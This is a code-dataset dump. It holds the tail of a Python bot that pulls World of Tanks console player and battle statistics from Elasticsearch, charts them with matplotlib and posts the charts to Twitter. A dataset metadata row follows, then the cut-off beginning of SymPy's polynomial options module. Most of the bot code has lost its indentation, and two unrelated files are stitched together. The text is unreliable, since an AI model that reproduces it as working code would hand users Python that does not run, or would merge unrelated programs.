fig = plt.figure(figsize=(11, 8), dpi=150)
then = datetime.utcnow() - timedelta(days=1)
fig.suptitle("Breakdown of accounts by number of battles played for {}".format(then.strftime('%Y-%m-%d')))
# ax1 = plt.subplot2grid((11, 1), (0, 0), rowspan=10)
ax1 = plt.axes()
ax1.axis('equal')
size = 0.125
outer_labels = []
prev = 0
for key in buckets['all'].keys():
parts = key.split('-')
outer_labels.append('{}-{} battles'.format(int(float(parts[0])) if parts[0] != '*' else parts[0], int(float(parts[1])) - 1 if parts[1] != '*' else parts[1]))
# Outer pie chart
outer_cmap = plt.get_cmap("binary")
outer_colors = outer_cmap([i * 10 for i in range(10, len(buckets['all'].keys()) + 11)])
outer_wedges, outer_text, outer_autotext = ax1.pie(
buckets['all'].values(),
explode=[0.1 for __ in outer_labels],
radius=1,
colors=outer_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='%1.1f%%',
pctdistance=1.1
#labels=outer_labels
)
bbox_props = dict(boxstyle='square,pad=0.3', fc='w', ec='k', lw=0.72)
kw = dict(arrowprops=dict(arrowstyle='-'), bbox=bbox_props, zorder=0, va='center')
for i, wedge in enumerate(outer_wedges):
angle = calc_angle(wedge)
y = sin(angle * (pi / 180))
x = cos(angle * (pi / 180))
align = 'right' if x < 0 else 'left'
connectionstyle = 'angle,angleA=0,angleB={}'.format(angle)
kw['arrowprops'].update({'connectionstyle': connectionstyle})
ax1.annotate(
outer_labels[i],
xy=(x, y),
xytext=(1.35*(-1 if x < 0 else 1), 1.4*y),
horizontalalignment=align,
**kw
)
# Inner pie chart
inner_cmap = plt.get_cmap("tab20c")
pie_flat = list(zip(buckets['xbox'].values(), buckets['ps'].values()))
inner_labels = []
for pair in pie_flat:
inner_labels.extend(['xbox', 'ps'])
inner_colors = inner_cmap([1 if console == 'ps' else 9 for console in inner_labels])
inner_wedges, inner_text, inner_autotext = ax1.pie(
[item for sublist in pie_flat for item in sublist],
explode=[0.1 for __ in inner_labels],
radius=1.05-size,
colors=inner_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='',
pctdistance=0.9
)
# Replace inner text with actual values
for i, label, wedge, text in zip(range(len(inner_wedges)), inner_labels, inner_wedges, inner_autotext):
text.set_text(buckets[label]['other' if i // 2 > len(buckets['all'].keys()) - 1 else list(buckets['all'].keys())[i // 2]])
angle = calc_angle(wedge)
if 90 < angle < 270:
angle += 180
text.set_rotation(angle)
# Patch inner wedges to group together in explosion
# Influenced by: https://stackoverflow.com/a/20556088/1993468
groups = [[i, i+1] for i in range(0, len(inner_wedges), 2)]
radfraction = 0.1
for group in groups:
angle = ((inner_wedges[group[-1]].theta2 + inner_wedges[group[0]].theta1)/2) * (pi / 180)
for g in group:
wedge = inner_wedges[g]
wedge.set_center((radfraction * wedge.r * cos(angle), radfraction * wedge.r * sin(angle)))
ax1.legend(inner_wedges[-2:], ['xbox', 'ps'], loc='lower right')
fig.text(0.5, 0.5, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(BATTLERANGE_PNG)
del fig
def query_five_battles_a_day_minimum(config):
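    """Count accounts that played at least five battles on each day of the short-term window, per platform."""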
now = datetime.utcnow()
then = now - timedelta(days=config['days'])
es = Elasticsearch(**config['elasticsearch'])
five_battles_a_day_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
five_battles_a_day_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
response = es.search(index=config['battle index'], body=five_battles_a_day_query)
buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
for bucket in response['aggregations']['4']['buckets']:
key = bucket['key_as_string'].split('T')[0]
buckets['xbox'][key] = 0
buckets['ps'][key] = 0
buckets['all'][key] = 0
for subbucket in bucket['3']['buckets']:
buckets[subbucket['key']][key] = subbucket['2']['buckets']['5.0-*']['doc_count']
buckets['all'][key] = buckets['xbox'][key] + buckets['ps'][key]
return buckets
# Requested by Khorne Dog in the forums
def create_five_battles_minimum_chart(buckets, watermark_text='@WOTC_Tracker'):
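    """Draw the bar chart (with data table) of accounts that played at least five battles per day and save it to FIVEADAY_PNG."""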
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle("Number of accounts having played at least 5 battles")
ax1 = fig.add_subplot(111)
width = 0.25
keys = [datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1) for d in buckets['all'].keys()]
xkeys = [d - timedelta(hours=3) for d in keys]
pkeys = [d + timedelta(hours=3) for d in keys]
xbox_bars = ax1.bar(xkeys, buckets['xbox'].values(), width=width, color='g')
ps_bars = ax1.bar(pkeys, buckets['ps'].values(), width=width, color='b')
ax1.table(
cellText=[
list(buckets['xbox'].values()),
list(buckets['ps'].values()),
list(buckets['all'].values())],
rowLabels=['xbox', 'ps', 'all'],
colLabels=[d.strftime('%Y-%m-%d') for d in keys],
loc='bottom')
ax1.set_ylabel('Accounts')
ax1.set_xticks([])
ax1.legend((xbox_bars[0], ps_bars[0]), ('xbox', 'ps'))
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(FIVEADAY_PNG)
def query_long_term_data(config, filter_server_failures=True):
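    """Collect daily player and battle totals for the long-term window, optionally blanking days (and the day after) where the Playstation player count collapsed, which indicates a tracker failure."""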
now = datetime.utcnow()
then = now - timedelta(days=config.get('long term', 90) + 1)
es = Elasticsearch(**config['elasticsearch'])
# Setup queries
battles_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players = es.search(index=config['battle index'], body=players_query)
battles = es.search(index=config['battle index'], body=battles_query)
players_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
battles_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
average_battles_per_day_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
for bucket in players['aggregations']['2']['buckets']:
key = bucket['key_as_string'].split('T')[0]
players_buckets['xbox'][key] = 0
players_buckets['ps'][key] = 0
players_buckets['all'][key] = 0
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
players_buckets[subbucket['key']][key] = subbucket['doc_count']
players_buckets['all'][key] = players_buckets['xbox'][key] + players_buckets['ps'][key]
for bucket in battles['aggregations']['2']['buckets']:
key = bucket['key_as_string'].split('T')[0]
battles_buckets['xbox'][key] = 0
battles_buckets['ps'][key] = 0
battles_buckets['all'][key] = 0
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
battles_buckets[subbucket['key']][key] = subbucket['1']['value']
battles_buckets['all'][key] = battles_buckets['xbox'][key] + battles_buckets['ps'][key]
if filter_server_failures:
skip_next = False
for key, value in players_buckets['ps'].items():
# 20,000 is way below normal. Sometimes the server dies partway through. This day should be skipped
if value < 20000:
players_buckets['xbox'][key] = None
players_buckets['ps'][key] = None
players_buckets['all'][key] = None
battles_buckets['xbox'][key] = None
battles_buckets['ps'][key] = None
battles_buckets['all'][key] = None
skip_next = True
elif skip_next:
players_buckets['xbox'][key] = None
players_buckets['ps'][key] = None
players_buckets['all'][key] = None
battles_buckets['xbox'][key] = None
battles_buckets['ps'][key] = None
battles_buckets['all'][key] = None
skip_next = False
for key in players_buckets['all'].keys():
if players_buckets['xbox'][key] is None:
average_battles_per_day_buckets['all'][key] = None
average_battles_per_day_buckets['xbox'][key] = None
average_battles_per_day_buckets['ps'][key] = None
else:
average_battles_per_day_buckets['xbox'][key] = battles_buckets['xbox'][key] / players_buckets['xbox'][key]
average_battles_per_day_buckets['ps'][key] = battles_buckets['ps'][key] / players_buckets['ps'][key]
average_battles_per_day_buckets['all'][key] = (battles_buckets['xbox'][key] + battles_buckets['ps'][key]) / (players_buckets['xbox'][key] + players_buckets['ps'][key])
    # Drop the oldest bucket so only the requested number of days remains
    delkey = list(players_buckets['all'].keys())[0]
    # delkey = list(battles_buckets['all'].keys())[0]
    del players_buckets['all'][delkey]
    del players_buckets['xbox'][delkey]
    del players_buckets['ps'][delkey]
    del battles_buckets['all'][delkey]
    del battles_buckets['xbox'][delkey]
    del battles_buckets['ps'][delkey]
    del average_battles_per_day_buckets['xbox'][delkey]
    del average_battles_per_day_buckets['ps'][delkey]
    del average_battles_per_day_buckets['all'][delkey]
return players_buckets, battles_buckets, average_battles_per_day_buckets
def create_long_term_charts(players_buckets, battles_buckets, average_battles_per_day_buckets, watermark_text='@WOTC_Tracker'):
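    """Render the long-term players, battles and average-battles-per-account charts to their PNG files."""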
dates = [datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1) for d in players_buckets['all'].keys()]
# Players PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Active Accounts Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, players_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, players_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(PLAYERSLONG_PNG)
del fig
# Battles PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Total Battles Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, battles_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, battles_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(BATTLESLONG_PNG)
del fig
# Average PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Average Battles Played Per Account Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, average_battles_per_day_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, average_battles_per_day_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(AVERAGELONG_PNG)
del fig
def upload_long_term_charts(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
playerslong = api.media_upload(PLAYERSLONG_PNG)
battleslong = api.media_upload(BATTLESLONG_PNG)
averagelong = api.media_upload(AVERAGELONG_PNG)
api.update_status(
status='Long-term view of active accounts, with downtime and multi-day catchup errors omitted',
media_ids=[playerslong.media_id, battleslong.media_id, averagelong.media_id]
)
def upload_long_term_mode_charts(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
modelong = api.media_upload(MODEBREAKDOWNLONG_PNG)
percentlong = api.media_upload(MODEBREAKDOWNPERCENTLONG_PNG)
api.update_status(
status='Long-term view of battles per mode',
media_ids=[modelong.media_id, percentlong.media_id]
)
def upload_activity_graphs_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battles = api.media_upload(BATTLES_PNG)
players = api.media_upload(PLAYERS_PNG)
newplayers = api.media_upload(NEWPLAYERS_PNG)
averages = api.media_upload(AVERAGE_PNG)
api.update_status(
status=config['twitter']['message'],
media_ids=[players.media_id, battles.media_id, newplayers.media_id, averages.media_id]
)
def upload_account_age_graph_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
accountage = api.media_upload(ACCOUNTAGE_PNG)
api.update_status(
status='Breakdown of active accounts by age per platform on #worldoftanksconsole',
media_ids=[accountage.media_id]
)
def upload_accounts_by_battles_chart_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battlerange = api.media_upload(BATTLERANGE_PNG)
api.update_status(
status='Breakdown of accounts by number of battles played on #worldoftanksconsole',
media_ids=[battlerange.media_id]
)
def upload_five_battles_minimum_chart_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
fiveaday = api.media_upload(FIVEADAY_PNG)
api.update_status(
status='Filtering accounts per day with 5 battles minimum on #worldoftanksconsole',
media_ids=[fiveaday.media_id]
)
def share_unique_with_twitter(config, unique):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
status = 'Unique Active Accounts For {} Over Time\n{}'
formatting = '{} days: {}'
for key, values in unique.items():
api.update_status(
status=status.format(
key,
'\n'.join(map(lambda l: formatting.format(
config['unique'][values.index(l)], l), values))
)
)
def build_cw_tanks_list(config):
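    """Fetch the vehicle encyclopedia from the Wargaming API and build a query_string clause matching every tank whose era field is set (the Cold War vehicles)."""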
api = 'https://api-console.worldoftanks.com/wotx/encyclopedia/vehicles/'
params = {
'application_id': config['wg api key'],
'fields': 'era,tank_id'
}
data = get(api, params=params).json()['data']
return ' OR '.join(
list(
map(
lambda t: 'tank_id:{}'.format(t['tank_id']),
filter(lambda t: t['era'] != '', data.values())
)
)
)
def query_es_for_top_tanks(config, era):
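    """Return yesterday's five most-played tanks per platform for the given era ('ww2' or 'cw')."""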
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
if era == 'ww2':
query = ww2_popular_tanks_query
elif era == 'cw':
query = cw_popular_tanks_query
# Setup query
query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
response = es.search(index=config['tank index'], body=query)
buckets = {
'xbox': OrderedDict(),
'ps': OrderedDict()
}
for bucket in response['aggregations']['2']['buckets']:
for subbucket in bucket['4']['buckets']:
key = subbucket['key']
for tank in subbucket['3']['buckets']:
buckets[key][tank['key']] = int(tank['1']['value'])
return buckets
def query_for_tank_info(tanks):
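    """Resolve tank_ids to display names via the wotconsole.ru tankopedia; renames the 'ps' key to 'playstation'."""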
url = 'https://wotconsole.ru/api/tankopedia/en/{}.json'
new_tanks = {
'xbox': OrderedDict(),
'ps': OrderedDict()
}
for plat, t in tanks.items():
for tank, battles in t.items():
response = get(url.format(tank))
new_tanks[plat][response.json()['info']['user_string']] = battles
new_tanks['playstation'] = new_tanks['ps']
del new_tanks['ps']
return new_tanks
def share_top_tanks(config, era, top, day):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
for platform, tanks in top.items():
status = "Most used {} tanks on {} for {}\n{}"
formatting = '{}: {} battles'
api.update_status(
status=status.format(
era,
platform.capitalize(),
day,
'\n'.join([formatting.format(tank, battles) for tank, battles in tanks.items()])
)
)
def query_es_for_mode_battles_difference(config, long_term=False):
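    """Split daily battle totals into WW2 and Cold War per platform and compute the share of battles played in CW."""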
now = datetime.utcnow()
then = now - timedelta(days=config['days'] if not long_term else config['long term'])
es = Elasticsearch(**config['elasticsearch'])
# Setup query
battles_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
cw_popular_tanks_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
cw_popular_tanks_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
total_battles_response = es.search(index=config['battle index'], body=battles_query)
cw_battles_response = es.search(index=config['tank index'], body=cw_popular_tanks_query)
dates = [b['key_as_string'].split('T')[0] for b in total_battles_response[
'aggregations']['2']['buckets']]
# Filter numbers
ww2_battles_xbox = OrderedDict()
ww2_battles_ps = OrderedDict()
cw_battles_xbox = OrderedDict()
cw_battles_ps = OrderedDict()
percent_cw_xbox = OrderedDict()
percent_cw_ps = OrderedDict()
for d in dates:
ww2_battles_xbox[d] = 0
ww2_battles_ps[d] = 0
cw_battles_xbox[d] = 0
cw_battles_ps[d] = 0
percent_cw_xbox[d] = None
percent_cw_ps[d] = None
for bucket in total_battles_response['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
ww2_battles_xbox[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
else:
ww2_battles_ps[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
for bucket in cw_battles_response['aggregations']['2']['buckets']:
if not bucket['4']['buckets']:
continue
for subbucket in bucket['4']['buckets']:
if subbucket['key'] == 'xbox':
cw_battles_xbox[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
else:
cw_battles_ps[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
for i in range(len(dates)):
percent_cw_xbox[dates[i]] = cw_battles_xbox[dates[i]] / ww2_battles_xbox[dates[i]]
percent_cw_ps[dates[i]] = cw_battles_ps[dates[i]] / ww2_battles_ps[dates[i]]
ww2_battles_xbox[dates[i]] = ww2_battles_xbox[dates[i]] - cw_battles_xbox[dates[i]]
ww2_battles_ps[dates[i]] = ww2_battles_ps[dates[i]] - cw_battles_ps[dates[i]]
return dates, list(ww2_battles_xbox.values()), list(ww2_battles_ps.values()), list(cw_battles_xbox.values()), list(cw_battles_ps.values()), list(percent_cw_xbox.values()), list(percent_cw_ps.values())
def create_mode_difference_graph(dates, ww2_battles_xbox, ww2_battles_ps, cw_battles_xbox, cw_battles_ps, percent_cw_xbox, percent_cw_ps, long_term=False, watermark_text='@WOTC_Tracker'):
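    """Plot the estimated WW2 vs CW battle split and the CW percentage, saving to the short- or long-term PNGs."""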
shifted_dates = [(datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d') for d in dates]
# Mode PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150) if not long_term else plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Estimated breakdown of battles between CW and WW2, per platform' if not long_term else 'Estimated breakdown of battles between CW and WW2, per platform (long term)')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, ww2_battles_xbox, color='darkgreen', linewidth=2, label='WW2: Xbox')
ax1.plot(shifted_dates, cw_battles_xbox, color='lightgreen', linewidth=2, label='CW: Xbox')
ax1.plot(shifted_dates, ww2_battles_ps, color='darkblue', linewidth=2, label='WW2: Playstation')
ax1.plot(shifted_dates, cw_battles_ps, color='lightblue', linewidth=2, label='CW: Playstation')
ax1.set_ylim(bottom=0)
# for i in range(len(shifted_dates)):
# xbox_text = ax1.annotate(annotations_xbox[i], (shifted_dates[i], ww2_battles_xbox[i]), verticalalignment='bottom', size=12 if not long_term else 8)
# ps_text = ax1.annotate(annotations_ps[i], (shifted_dates[i], ww2_battles_ps[i]), verticalalignment='bottom', size=12 if not long_term else 8)
# xbox_text.set_rotation(90)
# ps_text.set_rotation(90)
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(MODEBREAKDOWN_PNG if not long_term else MODEBREAKDOWNLONG_PNG)
del fig
# Mode Percent PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150) if not long_term else plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Estimated percentage of battles taking place in CW, per platform' if not long_term else 'Estimated percentage of battles taking place in CW, per platform (long term)')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.yaxis.set_major_formatter(mtick.PercentFormatter(1.0))
ax1.tick_params(axis='x', labelrotation=45)
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, percent_cw_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, percent_cw_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(MODEBREAKDOWNPERCENT_PNG if not long_term else MODEBREAKDOWNPERCENTLONG_PNG)
del fig
def upload_mode_breakdown_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battles = api.media_upload(MODEBREAKDOWN_PNG)
percent = api.media_upload(MODEBREAKDOWNPERCENT_PNG)
api.update_status(
status="Estimated split between WW2 and CW battles",
media_ids=[battles.media_id, percent.media_id]
)
def get_universal_params(config):
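    """Build keyword arguments (currently just the watermark text) shared by all chart functions."""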
params = dict()
watermark = config.get('watermark text', None)
if watermark:
params['watermark_text'] = watermark
return params
if __name__ == '__main__':
agp = ArgumentParser(
description='Bot for processing tracker data and uploading to Twitter')
agp.add_argument('config', help='Config file location')
agp.add_argument('-u', '--upload', help='Upload to twitter', action='store_true')
agp.add_argument('--activity-graphs', action='store_true')
agp.add_argument('--account-age', action='store_true')
agp.add_argument('--accounts-by-battles', action='store_true')
agp.add_argument('--five-battles-min', action='store_true')
agp.add_argument('--long-term', action='store_true')
agp.add_argument('--share-unique', action='store_true')
agp.add_argument('--top-cw-tanks', action='store_true')
agp.add_argument('--top-ww2-tanks', action='store_true')
agp.add_argument('--mode-breakdown', action='store_true')
args = agp.parse_args()
config = manage_config('read', args.config)
additional_params = get_universal_params(config)
now = datetime.utcnow()
if args.top_cw_tanks or args.top_ww2_tanks or args.mode_breakdown or args.long_term:
CW_TANKS = build_cw_tanks_list(config)
cw_popular_tanks_query['query']['bool']['must'][0]['query_string']['query'] = CW_TANKS
ww2_popular_tanks_query['query']['bool']['must'][0]['query_string']['query'] = 'NOT (' + CW_TANKS + ')'
if args.activity_graphs:
try:
create_activity_graphs(*query_es_for_graphs(config), **additional_params)
if args.upload:
upload_activity_graphs_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.account_age:
try:
create_account_age_chart(query_es_for_active_accounts(config), **additional_params)
if args.upload:
upload_account_age_graph_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.accounts_by_battles:
try:
create_accounts_by_battles_chart(query_es_for_accounts_by_battles(config), **additional_params)
if args.upload:
upload_accounts_by_battles_chart_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.five_battles_min:
try:
create_five_battles_minimum_chart(query_five_battles_a_day_minimum(config), **additional_params)
if args.upload:
upload_five_battles_minimum_chart_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
# Limit long-term views to beginning of month to review previous month's history
if args.long_term:
if now.day == 1:
try:
create_long_term_charts(*query_long_term_data(config, config.get('omit errors long term', True)), **additional_params)
create_mode_difference_graph(*query_es_for_mode_battles_difference(config, long_term=True), long_term=True, **additional_params)
if args.upload:
upload_long_term_charts(config)
upload_long_term_mode_charts(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.share_unique:
try:
share_unique_with_twitter(config, query_es_for_unique(config))
except Exception as e:
# print(e)
traceback.print_exc()
if args.top_cw_tanks:
try:
share_top_tanks(config, 'CW', query_for_tank_info(query_es_for_top_tanks(config, 'cw')), (now - timedelta(days=1)).strftime('%Y-%m-%d'))
except Exception as e:
# print(e)
traceback.print_exc()
if args.top_ww2_tanks:
try:
share_top_tanks(config, 'WW2', query_for_tank_info(query_es_for_top_tanks(config, 'ww2')), (now - timedelta(days=1)).strftime('%Y-%m-%d'))
except Exception as e:
# print(e)
traceback.print_exc()
if args.mode_breakdown:
try:
create_mode_difference_graph(*query_es_for_mode_battles_difference(config), **additional_params)
if args.upload:
upload_mode_breakdown_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
| bot.py | 62,245 | Multi-day, use gte Multi-day, use gte Setup queries Query Elasticsearch Filter numbers Players PNG ax1 = plt.axes() Battles PNG ax = plt.axes() New Players PNG ax = plt.axes() Averages PNG ax = plt.axes() Get all account IDs of active players Query account information to get age details Sum account ages based on range of age Outer pie chartlabels=outer_labels Inner pie chart Replace inner text with actual values Patch inner wedges to group together in explosion Influenced by: https://stackoverflow.com/a/20556088/1993468 Add subplot in second row, below nested pie chart Xbox, Playstation ax1 = plt.subplot2grid((11, 1), (0, 0), rowspan=10) Outer pie chartlabels=outer_labels Inner pie chart Replace inner text with actual values Patch inner wedges to group together in explosion Influenced by: https://stackoverflow.com/a/20556088/1993468 Requested by Khorne Dog in the forums Setup queries 20,000 is way below normal. Sometimes the server dies partway through. This day should be skipped delkey = list(battles_buckets['all'].keys())[0] Players PNG ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d') Battles PNG ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d') Average PNG ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d') Setup query Query Elasticsearch Setup query Query Elasticsearch Filter numbers Mode PNG ax1 = plt.axes() for i in range(len(shifted_dates)): xbox_text = ax1.annotate(annotations_xbox[i], (shifted_dates[i], ww2_battles_xbox[i]), verticalalignment='bottom', size=12 if not long_term else 8) ps_text = ax1.annotate(annotations_ps[i], (shifted_dates[i], ww2_battles_ps[i]), verticalalignment='bottom', size=12 if not long_term else 8) xbox_text.set_rotation(90) ps_text.set_rotation(90) Mode Percent PNG ax1 = plt.axes() print(e) print(e) print(e) print(e) Limit long-term views to beginning of month to review previous month's history print(e) print(e) print(e) print(e) print(e) | 1,918 | en | 0.567588 |
"""Options manager for :class:`Poly` and public API functions. """
from __future__ import print_function, division
__all__ = ["Options"]
from sympy.core import S, Basic, sympify
from sympy.core.compatibility import string_types, with_metaclass
from sympy.utilities import numbered_symbols, topological_sort, public
from sympy.utilities.iterables import has_dups
from sympy.polys.polyerrors import GeneratorsError, OptionError, FlagError
import sympy.polys
import re
class Option(object):
"""Base class for all kinds of options. """
option = None
is_Flag = False
requires = []
excludes = []
after = []
before = []
@classmethod
def default(cls):
return None
@classmethod
def preprocess(cls, option):
return None
@classmethod
def postprocess(cls, options):
pass
class Flag(Option):
"""Base class for all kinds of flags. """
is_Flag = True
class BooleanOption(Option):
"""An option that must have a boolean value or equivalent assigned. """
@classmethod
def preprocess(cls, value):
if value in [True, False]:
return bool(value)
else:
raise OptionError("'%s' must have a boolean value assigned, got %s" % (cls.option, value))
class OptionType(type):
"""Base type for all options that does registers options. """
def __init__(cls, *args, **kwargs):
@property
def getter(self):
try:
return self[cls.option]
except KeyError:
return cls.default()
setattr(Options, cls.option, getter)
Options.__options__[cls.option] = cls
@public
class Options(dict):
"""
Options manager for polynomial manipulation module.
Examples
========
>>> from sympy.polys.polyoptions import Options
>>> from sympy.polys.polyoptions import build_options
>>> from sympy.abc import x, y, z
>>> Options((x, y, z), {'domain': 'ZZ'})
{'auto': False, 'domain': ZZ, 'gens': (x, y, z)}
>>> build_options((x, y, z), {'domain': 'ZZ'})
{'auto': False, 'domain': ZZ, 'gens': (x, y, z)}
**Options**
* Expand --- boolean option
* Gens --- option
* Wrt --- option
* Sort --- option
* Order --- option
* Field --- boolean option
* Greedy --- boolean option
* Domain --- option
* Split --- boolean option
* Gaussian --- boolean option
* Extension --- option
* Modulus --- option
* Symmetric --- boolean option
* Strict --- boolean option
**Flags**
* Auto --- boolean flag
* Frac --- boolean flag
* Formal --- boolean flag
* Polys --- boolean flag
* Include --- boolean flag
* All --- boolean flag
* Gen --- flag
"""
__order__ = None
__options__ = {}
def __init__(self, gens, args, flags=None, strict=False):
dict.__init__(self)
if gens and args.get('gens', ()):
raise OptionError(
"both '*gens' and keyword argument 'gens' supplied")
elif gens:
args = dict(args)
args['gens'] = gens
defaults = args.pop('defaults', {})
def preprocess_options(args):
for option, value in args.items():
try:
cls = self.__options__[option]
except KeyError:
raise OptionError("'%s' is not a valid option" % option)
if issubclass(cls, Flag):
if flags is None or option not in flags:
if strict:
raise OptionError("'%s' flag is not allowed in this context" % option)
if value is not None:
